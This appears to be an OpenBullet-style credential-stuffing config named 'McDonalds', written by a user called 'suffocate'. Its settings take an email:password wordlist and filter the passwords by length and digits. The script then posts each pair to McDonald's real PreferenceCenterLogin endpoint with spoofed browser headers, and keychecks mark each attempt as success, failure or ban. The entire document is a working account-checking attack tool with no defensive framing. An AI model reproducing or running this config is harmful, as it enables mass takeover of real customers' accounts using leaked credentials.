[SETTINGS]
{
  "Name": "McDonalds",
  "SuggestedBots": 12,
  "LastModified": "2018-09-25T20:53:55.717856+00:00",
  "AdditionalInfo": "- No Capture - No Captcha - ",
  "Author": "suffocate",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [
    {
      "SliceName": "USER",
      "RuleType": 2,
      "RuleString": "4",
      "Id": 1204900100
    },
    {
      "SliceName": "PASS",
      "RuleType": 2,
      "RuleString": "7",
      "Id": 870815279
    },
    {
      "SliceName": "PASS",
      "RuleType": 3,
      "RuleString": "15",
      "Id": 1326165129
    },
    {
      "SliceName": "PASS",
      "RuleType": 0,
      "RuleString": "Digit",
      "Id": 749263679
    }
  ],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://profile2.mcdonalds.com/mcdspreferencecenterv2.asmx/PreferenceCenterLogin" AutoRedirect=TRUE 
  CONTENT "{'ClientID': 'MCDS','EmailAddress': '<USER>','Password': '<PASS>','CultureInfo':'','ExternalInfo':''}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: User-Agent: Mozilla/5.0 (Android 8.0.0; Mobile; rv:64.0) Gecko/64.0 Firefox/64.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://www.mcdonalds.com/us/en-us/subscription.html?op=update" 
  HEADER "Connection: keep-alive" 
  HEADER "Origin: https://www.mcdonalds.com" 
PARSE "<ClientID>" LR "" "" Recursive=FALSE -> VAR "ClientID" "" "" 
REQUEST POST "https://profile2.mcdonalds.com/mcdspreferencecenterv2.asmx/PreferenceCenterLogin" AutoRedirect=TRUE 
  CONTENT "{'ClientID': 'MCDS', 'EmailAddress': '<USER>', 'Password': '<PASS>', 'CultureInfo':'', 'ExternalInfo':''}" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 " 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://www.mcdonalds.com/us/en-us/subscription.html?op=update" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "invalid" 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "invalid" 
  KEYCHAIN Ban OR 
    KEY "Missing" 
